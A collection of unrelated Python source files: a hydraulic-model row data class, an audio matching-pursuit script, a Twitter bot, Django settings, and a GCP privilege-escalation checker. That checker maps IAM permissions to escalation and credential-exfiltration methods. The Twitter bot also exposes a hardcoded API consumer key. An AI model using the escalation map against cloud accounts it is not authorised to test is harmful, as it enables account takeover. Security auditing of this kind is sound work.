RowDataCollection object. This is an object used to hold all of the data for a specific row of a unit in an ISIS dat file. It acts a collection pattern to make accessing and updating the contents of a row simpler. Author: Created: 01 Apr 2016 Copyright: 2016 TODO: Updates: """ from __future__ import unicode_literals import copy import logging logger = logging.getLogger(__name__) from ship.datastructures.dataobject import * """logging references with a __name__ set to this module.""" class RowDataCollection(object): """Composite/Facade for the ADataRowObject classes. AUnit classes should instantiate this class in order to manage all the ADataRowObject classes used to hold the units row data. There are several convenience methods to retrieve and safely update the contents. Note: There are many references to a 'key' variable in this class to decipher which object in the collection to access/update/etc. This is one of the ROW_DATA_TYPES enum values in the datunits package. See Also: ROW_DATA_TYPE - in :class:'datunits ' module. TODO: Need to find a way to safely add values to the collection while making sure that all the data objects stay in sync (i.e. have the same number of rows), otherwise it will be chaos. At the moment this is tricky because we need to add individual values at the start. Possibly stop client from using any get methods etc unless all the data objects have the same number of rows. For the time being there is a convenience method checkRowsInSync() that can be called to verify that all of the data objects in this collection have the same length. """ def __init__(self, **kwargs): """Create a reference to the collection list.""" self._collection = [] self._min_collection = 0 self._current_collection = 0 self._updateCallback = kwargs.get('update_callback', None) self.has_dummy = False @classmethod def bulkInitCollection(cls, dataobjects, **kwargs): rc = cls(**kwargs) for d in dataobjects: rc._collection.append(d) rc._max = len(rc._collection) return rc @property def row_count(self): return self.numberOfRows() # def initCollection(self, dataobject): def addToCollection(self, dataobject, index=None): """Setup a new data object and add it to the collection. Args: obj_type (str): The type of ADataRowObject to create. This should be a DataTypes enum from the ADataObject module. vars (list): The variables specific to the ADataRowObject that is going to be instantiated. See Also: ADataRowObject (and subclasses), DataTypes - all in ADataObject module. """ if index is None: self._collection.append(dataobject) else: try: self._collection.insert(index, dataobject) except IndexError: raise('Index %s does not exist in collection' % index) self._max = len(self._collection) def indexOfDataObject(self, key): """Get the index of the DataObject with data_type equal to key. """ for i, c in enumerate(self._collection): if c.data_type == key: return i def iterateRows(self, key=None): """Returns a generator for iterating through the rows in the collection. If no key is given it will return a list containing all of the values in the row. Args: key=None(int): ROW_DATA_TYPE to return. If None all values in the row will be returned as a list. Return: list if key == None, a single value otherwise. """ if key is None: for i in range(0, self.row_count): yield [o.getValue(i) for o in self._collection] else: index = self.indexOfDataObject(key) for i in range(0, self.row_count): yield self._collection[index].getValue(i) def rowAsDict(self, index): """Get the data vals in a particular row by index. 
Args: index(int): the index of the row to return. Return: dict - containing the values for the requested row. """ output = {} for obj in self._collection: output[obj.data_type] = obj.getValue(index) return output def rowAsList(self, index): """Get the data vals in a particular row by index. Args: index(int): the index of the row to return. Return: dict - containing the values for the requested row. """ output = [] for obj in self._collection: output.append(obj.getValue(index)) return output def dataObject(self, name_key): """Return the ADataRowObject instance requested. Args: name_key (str): The key to use to retrieve the object (e.g. 'chainage'). This is usually a class declared constant e.g. RiverUnit.CHAINAGE. Returns: ADataRowObject or False if the key doesn't match any in the collection. Note: Returns a shallow copy of the collection. Any changes to the values will remain within the main list. If you want to be able to change it without affecting the main copy use getDataObjectCopy(). """ for obj in self._collection: if obj.data_type == name_key: return obj else: raise KeyError('name_key %s was not found in collection' % (name_key)) def dataObjectAsList(self, key): """Returns a DataObject as a list. This will return the row_collection DataObject referenced by the key provided (as a ROW_DATA_TYPES) in list form. If you intend to update the values you should use getRowDataObject instead as the data provided will be mutable and therefore reflected in the values held by the row_collection. If you just want a quick way to loop through the values in one of the data objects and only intend to read the data then use this. Args: key(str): the key for the data object requested. It is best to use the class constants (i.e. RiverUnit.CHAINAGE) for this. Returns: List containing the data in the DataObject that the key points to. Returns false if there is no row collection. Raises: KeyError: If key does not exist. """ try: data_col = self.dataObject(key) if data_col == False: raise KeyError('Key %s does not exist in collection' % (key)) vals = [] for i in data_col: vals.append(i) return vals except KeyError: raise def toList(self): """Returns the row data a list. Collects the row data in each of the ADataObjects in this collection into a list. Then adds them to a list based on the order of this collection. I.e. each inner list is the data pertaining to a single ADataObject. Example: [ [0.0, 1.5, 3.0], [32.5, 31.0, 31.5], [0.03, 0.03, 0.03] ] Returns: List - containing lists of the data in the DataObjects in this collection. Raises: KeyError: If key does not exist. """ outlist = [] for c in self._collection: innerlist = [] for i in c: innerlist.append(i) outlist.append(innerlist) return outlist def toDict(self): """Returns the row data object as a dict. Provides a dict where keys are the datunits.ROW_DATA_TYPES and the values are lists of the values for that type in sequence. If you intend to update the values you should use getRowDataObject instead as the data provided will be mutable and therefore reflected in the values held by the collection. If you just want to read the data then use this. Returns: dict - containing lists of values by ROW_DATA_TYPE. """ vals = {} for c in self._collection: inner = [] for i in c: inner.append(i) vals[c.data_type] = inner return vals def dataValue(self, key, index): """Get the value in a DataObject at index. Args: key(int): ROW_DATA_TYPES for the DataObject. index(int): the row to return the value from. Return: The value in the DataObject at given index. 
Raises: KeyError - if key does not exist in collection. IndexError - if index does not exist in DataObject. """ for c in self._collection: if c.data_type == key: val = c.getValue(index) return val else: raise KeyError('DataObject %s does not exist in collection' % key) def _addValue(self, key, value=None): """Add a new value to the data object in the collection as referenced by the key provided. Note: You almost certainly don't want to be using this. It's used internally to add values to ADataObject's. If you need to add data use the addRow() method. Args: key (int): Name of the data object to add the given value to. value: Optional - The value to add to the collection. If no value is supplied a default will be used. Raises: KeyError: If the name key doesn't exist in the collection. TODO: Check what other errors are thrown by the data object and make sure that they are dealt with/passed on from here. """ # Find the collection by the key and add the value to it. for c in self._collection: if c.data_type == key: c.addValue(value) break else: raise KeyError('Key %s does not exist in collection' % (key)) # Do this after so it's not removed when something goes wrong if self.has_dummy: self.deleteRow(0) self.has_dummy = False def _setValue(self, key, value, index): """Set the value to the data object in the collection. Note: You almost certainly don't want to be using this. It's used internally to set alues to ADataObject's. If you need to add data use the updateRow() method. It will check consitency across the collection. Args: key (int): the type data object to add the given value to. value: The value to add to the collection. index (int): the index to set the value at. Raises: KeyError: If the name key doesn't exist in the collection. ValueError: If the value is not appropriate for the data type """ # Find the collection by the key and add the value to it. for c in self._collection: if c.data_type == key: try: c.setValue(value, index) break except ValueError: raise else: raise KeyError('Key %s does not exist in collection' % (key)) def getPrintableRow(self, index): """ Get the row data in printable form. Retrieves all of the values in this RowDataObjectCollection in the order that it exists in the list. Args: index (int): the row collection index to access. Returns: string formatted for printing to .DAT file. """ out_str = '' for i, obj in enumerate(self._collection): out_str += obj.getPrintableValue(index) return out_str def updateRow(self, row_vals, index, **kwargs): """Add a new row to the units data rows. Creates a new row from the values in the supplied value dict at the location given by the index. If the index is None then the value will be appended to the end of the row rather than inserted. **kwargs: 'no_copy'(bool): if True the deepcopy of the object will not be made. This is useful if you are loading a lot of data and don't want the overhead of deepcopy - like loading a new model. Default is False. Note: If there is any problem while updating the values in the row all datarow objects will be returned to the state they were in before the operation. This ensures that they don't get out of sync if an error is found halfway through adding the different values. This is done by creating a deep copy of the object prior to updating. Args: row_vals (dict): Contains the names of the data objects of collection as keys and the new row values as values. index (int): The index at which to insert the row. Raises: KeyError: If any of the keys don't exist. IndexError: If the index doesn't exist. 
""" no_copy = kwargs.get('no_copy', False) if index > self.row_count: raise IndexError dataobj_keys = self.collectionTypes() vkeys = row_vals.keys() for k in vkeys: if not k in dataobj_keys: raise KeyError('ROW_DATA_TYPE ' + str(k) + 'is not in collection') temp_list = None try: # Need to make a deep copy of the data_object so we can reset them back # to the same place if there's a problem. That way we don't get the lists # in the different objects out of sync. if not no_copy: temp_list = self._deepCopyDataObjects(self._collection) for key, val in row_vals.items(): self._setValue(key, val, index) except (IndexError, ValueError, Exception) as err: self._resetDataObject(temp_list) raise err finally: if temp_list is not None: for o in temp_list: del o del temp_list def addRow(self, row_vals, index=None, **kwargs): """Add a new row to the units data rows. Creates a new row from the values in the supplied value dict at the location given by the index. If the index is None then the value will be appended to the end of the row rather than inserted. Note: If there is any problem while adding the new row all datarow objects will be returned to the state they were in before the operation. This ensures that they don't get out of sync if an error is found halfway through adding the different values. This is done by creating a deep copy of the object prior to updating. **kwargs: 'no_copy'(bool): if True the deepcopy of the object will not be made. This is useful if you are loading a lot of data and don't want the overhead of deepcopy - like loading a new model. Default is False. Args: row_vals (dict): Contains the names of the data objects of collection as keys and the new row values as values. index (int): The index at which to insert the row. If None it will be appended to end of the collection. Raises: KeyError: If any of the keys don't exist. IndexError: If the index doesn't exist. """ no_copy = kwargs.get('no_copy', False) if index is not None and index > self.row_count: raise IndexError dataobj_keys = self.collectionTypes() vkeys = row_vals.keys() for k in vkeys: if not k in dataobj_keys: raise KeyError('ROW_DATA_TYPE ' + str(k) + 'is not in collection') temp_list = None try: # Need to make a deep copy of the data_object so we can reset them back # to the same place if there's a problem. That way we don't get the lists # in the different objects out of sync. if not no_copy: temp_list = self._deepCopyDataObjects(self._collection) for obj in self._collection: if not obj.data_type in vkeys: if obj.default is not None: obj.addValue(obj.default, index) else: raise ValueError else: obj.addValue(row_vals[obj.data_type], index) if not self.checkRowsInSync(): raise RuntimeError except (IndexError, ValueError, Exception): self._resetDataObject(temp_list) raise except RuntimeError as err: logger.error('Collection not in sync!') logger.exception(err) self._resetDataObject(temp_list) logger.error('Collection reset to previous state') raise finally: if temp_list is not None: for o in temp_list: del o del temp_list # Do this after so it's not removed if something goes wrong if self.has_dummy: self.deleteRow(0, no_copy=True) self.has_dummy = False def deleteRow(self, index, **kwargs): """Delete a row from the collection. **kwargs: 'no_copy'(bool): if True the deepcopy of the object will not be made. This is useful if you are loading a lot of data and don't want the overhead of deepcopy - like deleting the dummy row. Default is False. Args: index(int): the index to delete the values for. 
Raise: IndexError: if index is out of the bounds of the collection. """ no_copy = kwargs.get('no_copy', False) if index < 0 or index > self.row_count: raise IndexError temp_list = None try: # Need to make a deep copy of the data_object so we can reset them back # to the same place if there's a problem. That way we don't get the lists # in the different objects out of sync. if not no_copy: temp_list = self._deepCopyDataObjects(self._collection) for obj in self._collection: obj.deleteValue(index) except (IndexError, ValueError, Exception): self._resetDataObject(temp_list) raise finally: if temp_list is not None: for o in temp_list: del o del temp_list def collectionTypes(self): """Get a list of the types (names) of all the objects in the collection. The list returned will contain all of the names used in this row collection. e.g. 'chainage', 'elevation' etc. Returns: keys (list): containing the names of the data objects. """ keys = [] for obj in self._collection: keys.append(obj.data_type) return keys def dataObjectCopy(self, name_key): """Return the ADataRowObject instance requested. Same as the getDataObject() method except it makes a deep copy of the data object before returning it so that any changes will local to the returned copy only and not to the main reference. Args: name_key (str): The key to use to retrieve the object (e.g. 'chainage'). This is usually a class declared constant e.g. RiverUnit.CHAINAGE. Returns: ADataRowObject or False if the key doesn't match any in the collection. """ for obj in self._collection: if obj.data_type == name_key: obj_copy = self._deepCopyDataObjects(obj) return obj_copy else: raise KeyError('name_key %s was not found in collection' % (name_key)) def deleteDataObject(self, name_key): """Delete the ADataRowObject instance requested. Args: name_key (str): The key to use to retrieve the object (i.e. 'chainage') Returns: True if the object was successfully deleted; False if not. """ for obj in self._collection: if obj.data_type == name_key: self._collection.remove(obj) self._max = len(self._collection) return True else: return False def setDummyRow(self, row_vals): """Sets a special 'dummy row' as a placeholder until actual values. Sometimes it can be useful to have placeholder values in a collection. This is particularly true for FMP units that will cause errors in FMP if there is no data in the rows. This method will add the dummy row data and set the self.has_dummy flag to True. When actual row data is added to the collection it will check the flag and delete the row if it's True. """ self.addRow(row_vals, no_copy=True) if self.has_dummy: self.deleteRow(0, no_copy=True) self.has_dummy = True def numberOfRows(self): """Return the number of rows held in the collection Returns: int - number of rows in this collection. """ if not self.checkRowsInSync(): raise RuntimeError('RowCollection objects are not in sync') if self.has_dummy: return 0 else: return len(self._collection[0]) def checkRowsInSync(self): """Checks that the data objects in the collection are in sync. All the rows should be the same length. If they aren't then there's a problem and it will corrupt any output .dat file. Warning: It isn't actually that hard to corrupt the collection at the moment. It's ok if the DataObject classes are only accessed through here. If they are accessed independently of this class and not carefully checked they could fall out of sync. Returns: True if all data collections have the same length, otherwise False. 
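# --- Hedged usage sketch (not part of the original sources) ---------------------
# RowDataCollection only relies on a small duck-typed interface of its data
# objects (data_type, default, record_length, addValue, setValue, getValue,
# deleteValue, iteration and len), so it can be exercised with a minimal stand-in
# instead of the real ship dataobject classes. Names and values are illustrative.
class SimpleRowData(object):
    def __init__(self, data_type, default=None):
        self.data_type = data_type
        self.default = default
        self._values = []

    @property
    def record_length(self):
        return len(self._values)

    def addValue(self, value=None, index=None):
        # Append when no index is given, otherwise insert at the index.
        if index is None:
            self._values.append(value)
        else:
            self._values.insert(index, value)

    def setValue(self, value, index):
        self._values[index] = value

    def getValue(self, index):
        return self._values[index]

    def deleteValue(self, index):
        del self._values[index]

    def __len__(self):
        return len(self._values)

    def __iter__(self):
        return iter(self._values)


row_data = RowDataCollection.bulkInitCollection(
    [SimpleRowData('chainage', default=0.0), SimpleRowData('elevation', default=0.0)])
row_data.addRow({'chainage': 0.0, 'elevation': 32.5})
row_data.addRow({'chainage': 1.5, 'elevation': 31.0})
print(row_data.numberOfRows())    # 2
print(row_data.rowAsDict(0))      # {'chainage': 0.0, 'elevation': 32.5}
for row in row_data.iterateRows():
    print(row)                    # [0.0, 32.5] then [1.5, 31.0]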
""" lengths = [] for obj in self._collection: lengths.append(obj.record_length) return lengths[1:] == lengths[:-1] def _resetDataObject(self, temp_list): """Reset the data_objects list to its previous state. This method is called when there is a problem with updating the data_objects list. It returns the self owned versions to their original state. Args: temp_list: The versions to return the objects to. """ if temp_list is not None: self._collection = temp_list for o in temp_list: del o del temp_list def _deepCopyDataObjects(self, obj): """Create a deep copy of the data_objects """ object_copy = copy.deepcopy(obj) return object_copy #!/usr/bin/env python3 import sys import json # You can correlate these to the described methods here: https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/ and here: https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/ methods_and_permissions = { 'UpdateIAMRole': { 'Permissions': [ 'iam.roles.update' ], 'Scope': [ 'Organization', 'Project' ] }, 'CreateServiceAccountKey': { 'Permissions': [ 'iam.serviceAccountKeys.create' ], 'Scope': [ 'Organization', 'Folder', 'Project', 'ServiceAccount' ] }, 'GetServiceAccountAccessToken': { 'Permissions': [ 'iam.serviceAccounts.getAccessToken' ], 'Scope': [ 'Organization', 'Folder', 'Project', 'ServiceAccount' ] }, 'ServiceAccountImplicitDelegation': { 'Permissions': [ 'iam.serviceAccounts.implicitDelegation' ], 'Scope': [ 'Organization', 'Folder', 'Project', 'ServiceAccount' ] }, 'ServiceAccountSignBlob': { 'Permissions': [ 'iam.serviceAccounts.signBlob' ], 'Scope': [ 'Organization', 'Folder', 'Project', 'ServiceAccount' ] }, 'ServiceAccountSignJwt': { 'Permissions': [ 'iam.serviceAccounts.signJwt' ], 'Scope': [ 'Organization', 'Folder', 'Project', 'ServiceAccount' ] }, 'SetOrgPolicyConstraints': { 'Permissions': [ 'orgpolicy.policy.set' ], 'Scope': [ 'Organization', 'Folder', 'Project' ] }, 'CreateServiceAccountHMACKey': { 'Permissions': [ 'storage.hmacKeys.create' ], 'Scope': [ 'Organization', 'Folder', 'Project', 'ServiceAccount' ] }, 'CreateDeploymentManagerDeployment': { 'Permissions': [ 'deploymentmanager.deployments.create' ], 'Scope': [ 'Organization', 'Folder', 'Project' ] }, 'RCECloudBuildBuildServer': { 'Permissions': [ 'cloudbuild.builds.create' ], 'Scope': [ 'Organization', 'Folder', 'Project' ] }, 'ExfilCloudFunctionCredsAuthCall': { 'Permissions': [ 'cloudfunctions.functions.create', 'cloudfunctions.functions.sourceCodeSet', 'iam.serviceAccounts.actAs', 'cloudfunctions.functions.call' ], 'Scope': [ 'Organization', 'Folder', 'Project' ] }, 'ExfilCloudFunctionCredsUnauthCall': { 'Permissions': [ 'cloudfunctions.functions.create', 'cloudfunctions.functions.sourceCodeSet', 'iam.serviceAccounts.actAs', 'cloudfunctions.functions.setIamPolicy' ], 'Scope': [ 'Organization', 'Folder', 'Project' ] }, 'UpdateCloudFunction': { 'Permissions': [ 'cloudfunctions.functions.sourceCodeSet', 'cloudfunctions.functions.update', 'iam.serviceAccounts.actAs' ], 'Scope': [ 'Organization', 'Folder', 'Project' ] }, 'CreateGCEInstanceWithSA': { 'Permissions': [ 'compute.disks.create', 'compute.instances.create', 'compute.instances.setMetadata', 'compute.instances.setServiceAccount', 'compute.subnetworks.use', 'compute.subnetworks.useExternalIp', 'iam.serviceAccounts.actAs' ], 'Scope': [ 'Organization', 'Folder', 'Project' ] }, 'ExfilCloudRunServiceUnauthCall': { 'Permissions': [ 'run.services.create', 'iam.serviceaccounts.actAs', 'run.services.setIamPolicy' ], 
'Scope': [ 'Organization', 'Folder', 'Project' ] }, 'ExfilCloudRunServiceAuthCall': { 'Permissions': [ 'run.services.create', 'iam.serviceaccounts.actAs', 'run.routes.invoke' ], 'Scope': [ 'Organization', 'Folder', 'Project' ] }, 'CreateAPIKey': { 'Permissions': [ 'serviceusage.apiKeys.create' ], 'Scope': [ 'Organization', 'Folder', 'Project' ] }, 'ViewExistingAPIKeys': { 'Permissions': [ 'serviceusage.apiKeys.list' ], 'Scope': [ 'Organization', 'Folder', 'Project' ] }, 'SetOrgIAMPolicy': { 'Permissions': [ 'resourcemanager.organizations.setIamPolicy' ], 'Scope': [ 'Organization' ] }, 'SetFolderIAMPolicy': { 'Permissions': [ 'resourcemanager.folders.setIamPolicy' ], 'Scope': [ 'Organization', 'Folder' ] }, 'SetProjectIAMPolicy': { 'Permissions': [ 'resourcemanager.projects.setIamPolicy' ], 'Scope': [ 'Organization', 'Folder', 'Project' ] }, 'SetServiceAccountIAMPolicy': { 'Permissions': [ 'iam.serviceAccounts.setIamPolicy' ], 'Scope': [ 'Organization', 'Folder', 'Project', 'ServiceAccount' ] }, 'CreateCloudSchedulerHTTPRequest': { 'Permissions': [ 'cloudscheduler.jobs.create', 'cloudscheduler.locations.list', 'iam.serviceAccounts.actAs' ], 'Scope': [ 'Organization', 'Folder', 'Project' ] } } def check_privesc(permissions, resource_type, resource_id, member, f): first_method = True for privesc_method in methods_and_permissions: if set(methods_and_permissions[privesc_method]['Permissions']).issubset(set(permissions)) and resource_type[:-1] in methods_and_permissions[privesc_method]['Scope']: if first_method: # Only print out a user if there is a method associated with it print(f'{member} on {resource_type[:-1]} {resource_id}:') f.write(f'{member} on {resource_type[:-1]} {resource_id}:\n') first_method = False print(f' {privesc_method}') f.write(f' {privesc_method}\n') if first_method is False: f.write('\n') try: # Output from enumerate_member_permissions.py with open('all_org_folder_proj_sa_permissions.json', 'r') as f: permissions = json.load(f) except FileNotFoundError: print('Could not find all_org_folder_proj_sa_permissions.json. Run "enumerate_member_permissions.py" first!') sys.exit(1) print('All Privilege Escalation Methods\n') with open('privesc_methods.txt', 'w+') as f: for resource_type in permissions: # Org, Folder, Proj, SA for resource in permissions[resource_type]: # IDs of Orgs, Folders, Projs, SAs for member in permissions[resource_type][resource]: # Members with permissions on the current resource check_privesc(permissions[resource_type][resource][member], resource_type, resource, member, f) print('Misc. 
setIamPolicy Permissions\n') with open('setIamPolicy_methods.txt', 'w+') as f: first_method = True for resource_type in permissions: # Org, Folder, Proj, SA for resource in permissions[resource_type]: # IDs of Orgs, Folders, Projs, SAs for member in permissions[resource_type][resource]: # Members with permissions on the current resource for permission in permissions[resource_type][resource][member]: if 'setIamPolicy' in permission: if first_method: # Only print out a user if there is a method associated with it print(f'{member} on {resource_type[:-1]} {resource}:') f.write(f'{member} on {resource_type[:-1]} {resource}:\n') first_method = False print(f' {permission}') f.write(f' {permission}\n') if first_method is False: f.write('\n') print('\nDone!') print('Results output to ./privesc_methods.txt and ./setIamPolicy_methods.txt...') from rest_framework import serializers from .pid import ActionPID class ActionPidSerializer(serializers.Serializer): pid = serializers.CharField(max_length=26) info = serializers.SerializerMethodField() def get_info(self, obj): pid = ActionPID(self.validated_data['pid']) info = pid.info() if info: return { 'type': info['type'], 'created_on': info['dt'] } else: return { 'error': 'Not found' } 1-10 #!/usr/bin/env python2 # -*- coding: utf-8 -*- """ @author: Kimia """ from gammatone_utils import * from scikits.talkbox import segment_axis from scikits.audiolab import Sndfile, play import matplotlib.pyplot as plt plt.style.use('ggplot') def matching_pursuit(signal, dict_kernels, threshold=0.1, max_iter=2000): """ Matching pursuit algorithm for encoding :param signal: input signal :param dict_kernels: dictionary of kernels, each column is a kernel :param threshold: stop condition :param max_iter: maximum number of iterations :return: array of scalar weighting factor (one per kernel) """ # Initialization res = signal coeff = np.zeros(dict_kernels.shape[0]) # Iterative decomposition for i in range(max_iter): inner_prod = res.dot(dict_kernels.T) max_kernel = np.argmax(inner_prod) coeff[max_kernel] = inner_prod[max_kernel] / np.linalg.norm(dict_kernels[max_kernel,: ])**2 res = res - coeff[max_kernel] * dict_kernels[max_kernel,: ] if np.linalg.norm(res) < threshold: return coeff return coeff # Parametrization b = 1.019 resolution = 160 step = 8 n_channels = 128 overlap = 50 # Compute gammatone-based dictionary D_multi = np.r_[tuple(gammatone_matrix(b, fc, resolution, step)[0] for fc in erb_space(150, 8000, n_channels))] freq_c = np.array([gammatone_matrix(b, fc, resolution, step)[1] for fc in erb_space(150, 8000, n_channels)]).flatten() centers = np.array([gammatone_matrix(b, fc, resolution, step)[2] + i*resolution for i, fc in enumerate(erb_space(150, 8000, n_channels))]).flatten() # Load test signal filename = 'data/fsew/fsew0_001.wav' f = Sndfile(filename, 'r') nf = f.nframes fs = f.samplerate length_sound = 20000 y = f.read_frames(5000) y = f.read_frames(length_sound) Y = segment_axis(y, resolution, overlap=overlap, end='pad') Y = np.hanning(resolution) * Y # Encoding with matching pursuit X = np.zeros((Y.shape[0],D_multi.shape[0])) for idx in range(Y.shape[0]): X[idx, :] = matching_pursuit(Y[idx, :], D_multi) # Reconstruction of the signal out = np.zeros(int((np.ceil(len(y)/resolution)+1)*resolution)) for k in range(0, len(X)): idx = range(k*(resolution-overlap), k*(resolution-overlap) + resolution) out[idx] += np.dot(X[k], D_multi) squared_error = np.sum((y - out[0:len(y)]) ** 2) # Play the original signal and the reconstructed for comparison play(y, fs=16000) 
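# --- Hedged self-contained check (not part of the original sources) -------------
# matching_pursuit above is exercised here with a small random dictionary instead
# of gammatone kernels (numpy is assumed to be imported as np, as in this script).
# A signal built from two known atoms should select those atoms first.
rng = np.random.RandomState(0)
atoms = rng.randn(16, 64)                   # 16 kernels, each of length 64
signal = 2.0 * atoms[3] + 0.5 * atoms[11]   # exact mixture of atoms 3 and 11
code = matching_pursuit(signal, atoms, threshold=1e-3, max_iter=200)
print(np.nonzero(code)[0])                  # selected atoms; 3 and 11 should be among them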
play(out, fs=16000) # Plotting results # 1st plot: original signal/reconstructed signal/residuals arr = np.array(range(length_sound))/float(fs) plt.figure(1) plt.subplot(311) plt.plot(arr, y, 'b', label="Input Signal") plt.legend() plt.subplot(312) plt.plot(arr, out[0:len(y)], 'r', label="Recontruction") plt.legend() plt.subplot(313) plt.plot(arr, (y - out[0:len(y)])**2, 'g', label="Residual") plt.legend() plt.xlabel("Time in s") plt.show() # 2nd plot: spike train plt.figure(2) spikes_pos = np.array(np.nonzero(X)) temporal_position = centers[spikes_pos[0][:]] centre_freq = freq_c[spikes_pos[1][:]] plt.scatter(temporal_position, centre_freq, marker='+', s=1) plt.show() # 3rd plot: example of gammatone-based dictionary fig = plt.figure(3) fig.suptitle("Gammatone filters", fontsize="x-large") freqs = [1000, 300, 40] resolution = 5000 for center in [100, 1500, 3000]: plt.subplot(311) plt.plot(gammatone_function(resolution, freqs[0], center), linewidth=1.5) plt.subplot(312) plt.plot(gammatone_function(resolution, freqs[1], center+300), linewidth=1.5) plt.ylabel("Kernel values") plt.subplot(313) plt.plot(gammatone_function(resolution, freqs[2], center+1000), linewidth=1.5) plt.xlabel("Time (s)") plt.show() from __future__ import print_function import requests from bs4 import BeautifulSoup import tweepy import datetime # this is the URL we will visit to pull the image URL = 'http://www.newseum.org/todaysfrontpages/?tfp_show=all&tfp_id=NY_NYT' # a css selector that matches the images SELECTOR = '.tfp-thumbnail img' # twitter API keys CONSUMER_KEY = '6U0m0uYAAVRWud3fQ6luuaCmj' CONSUMER_SECRET = '**SECRET**' TOKEN = '' TOKEN_SECRET = '**SECRET**' # location to store file before tweeting (must be in /tmp) FILENAME = '/tmp/temp.jpg' def lambda_handler(event, context): # load the page html and parse it with beutifulsoup page = requests.get(URL) soup = BeautifulSoup(page.text) # select the image tag from the html image_el= soup.select(SELECTOR)[0] # create a twitter api object with our keys auth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET) auth.set_access_token(TOKEN, TOKEN_SECRET) api = tweepy.API(auth) # fetch the raw image using the src attribute on the image tag img = requests.get(image_el['src'], stream=True) # load the image file and save it to FILENAME with open(FILENAME, "wb") as i: i.write(img.raw.read()) # tweet the image with todays date as text api.update_with_media(FILENAME, status=datetime.date.today().strftime('%A %B %e, %Y')) return True __version__ = "0.0.1" from ._reader import get_reader from ._widget import smooth_image, measure_features, view_features from ._writer import write_zarr # -*- coding: utf-8 -*- from sqlalchemy import Column, Float, String from sqlalchemy.orm import declarative_base from zvt.contract import Mixin from zvt.contract.register import register_schema Stock1dMaFactorBase = declarative_base() class Stock1dMaFactor(Stock1dMaFactorBase, Mixin): __tablename__ = "Stock1dMaFactor" level = Column(String(length=32)) code = Column(String(length=32)) name = Column(String(length=32)) open = Column(Float) close = Column(Float) high = Column(Float) low = Column(Float) ma5 = Column(Float) ma10 = Column(Float) ma34 = Column(Float) ma55 = Column(Float) ma89 = Column(Float) ma144 = Column(Float) ma120 = Column(Float) ma250 = Column(Float) register_schema(providers=["zvt"], db_name="stock_1d_ma_factor", schema_base=Stock1dMaFactorBase) # the __all__ is generated __all__ = ["Stock1dMaFactor"] smap_project/settings.py """ Django settings for docker_django project. 
Generated by 'django-admin startproject' using Django 1.8.1. For more information on this file, see https://docs.djangoproject.com/en/1.8/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/1.8/ref/settings/ """ # Build paths inside the project like this: os.path.join(BASE_DIR, ...) import os BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) SITE_ROOT = os.path.dirname(os.path.realpath(__file__)) # Quick-start development settings - unsuitable for production # See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/ # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = os.environ['SECRET_KEY'] # SECURITY WARNING: don't run with debug turned on in production! DEBUG = os.getenv('DEBUG', 'NO').lower() in ('on', 'true', 'y', 'yes') ALLOWED_HOSTS = ['*'] # Application definition INSTALLED_APPS = ( 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', 'smap' ) MIDDLEWARE_CLASSES = ( 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.auth.middleware.SessionAuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', 'django.middleware.security.SecurityMiddleware', ) ROOT_URLCONF = 'smap_project.urls' TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': [], 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.template.context_processors.debug', 'django.template.context_processors.request', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages', ], }, }, ] WSGI_APPLICATION = 'smap_project.wsgi.application' # Database # https://docs.djangoproject.com/en/1.8/ref/settings/#databases # DATABASES = { # 'default': { # 'ENGINE': 'django.db.backends.sqlite3', # 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'), # } # } if DEBUG: DATABASES = { 'default': { 'ENGINE': 'django.db.backends.postgresql_psycopg2', 'NAME': 'postgres', 'USER': 'postgres', 'PASSWORD': '', 'HOST': 'db', 'PORT': 5432 } } else: DATABASES = { 'default': { 'ENGINE': 'django.db.backends.postgresql_psycopg2', 'NAME': os.getenv('DB_NAME'), 'USER': os.getenv('DB_USER'), 'PASSWORD': os.getenv('DB_PASS'), 'HOST': os.getenv('DB_HOST'), 'PORT': 5432 } } # Internationalization # https://docs.djangoproject.com/en/1.8/topics/i18n/ LANGUAGE_CODE = 'en-us' TIME_ZONE = 'UTC' USE_I18N = True USE_L10N = True USE_TZ = True # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/1.8/howto/static-files/ STATIC_URL = '/static/' # STATICFILES_DIRS = ( # os.path.join(BASE_DIR, 'static'), # ) # print(STATICFILES_DIRS) STATIC_ROOT = os.path.join(BASE_DIR, 'static') LOGGING = { 'version': 1, 'formatters': { 'verbose': { 'format': '%(levelname)s %(asctime)s %(module)s %(process)d %(thread)d %(message)s' }, 'simple': { 'format': '%(levelname)s %(message)s' }, }, 'handlers': { 'file': { 'class': 'logging.FileHandler', 'filename': '/var/log/django.log', 'formatter': 'verbose', }, }, 'loggers': { 'django.request': { 'handlers': ['file'], 'level': 'INFO', 'propagate': False, } }, }dblakely/FastSK import os import os.path as osp import pandas as pd import matplotlib.pyplot as plt import matplotlib.style as 
